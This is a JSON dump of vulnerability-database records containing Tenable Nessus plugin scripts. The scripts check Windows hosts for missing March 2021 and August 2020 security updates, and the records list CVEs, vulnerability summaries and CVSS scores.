\"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000822\");\n script_xref(name:\"MSFT\", value:\"MS21-5000822\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000822: Windows 10 Version 1809 and Windows Server 2019 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000822.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095,\n CVE-2021-26860, CVE-2021-26862, CVE-2021-26863,\n CVE-2021-26864, CVE-2021-26865, CVE-2021-26866,\n CVE-2021-26868, CVE-2021-26870, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26874, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26876, CVE-2021-26877, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-26893, CVE-2021-26894,\n CVE-2021-26895, CVE-2021-26897, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000822-os-build-17763-1817-2eb6197f-e3b1-4f42-ab51-84345e063564\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b432623\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000822.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-03';\nvar kbs = make_list(\n '5000822'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000822])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-27T14:22:55", "description": "The remote Windows host is missing security update 4571702 or cumulative update 4571736. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1562)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571702: Windows Server 2012 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1464", "CVE-2020-1466", "CVE-2020-1467", "CVE-2020-1472", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1509", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1554", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1567", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_AUG_4571736.NASL", "href": "https://www.tenable.com/plugins/nessus/139493", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139493);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1464\",\n \"CVE-2020-1466\",\n \"CVE-2020-1467\",\n \"CVE-2020-1472\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1509\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1554\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1567\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4571702\");\n script_xref(name:\"MSKB\", value:\"4571736\");\n script_xref(name:\"MSFT\", value:\"MS20-4571702\");\n script_xref(name:\"MSFT\", value:\"MS20-4571736\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"KB4571702: Windows Server 2012 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571702\nor cumulative update 4571736. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC). An attacker who\n successfully exploited the vulnerability could run a\n specially crafted application on a device on the\n network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1562)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4571736/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0551e21\");\n # https://support.microsoft.com/en-us/help/4571702/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ece3db7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4571702 or Cumulative Update KB4571736.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571736',\n '4571702'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571736, 4571702])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:22:44", "description": "The remote Windows host is missing security update 4571719 or cumulative update 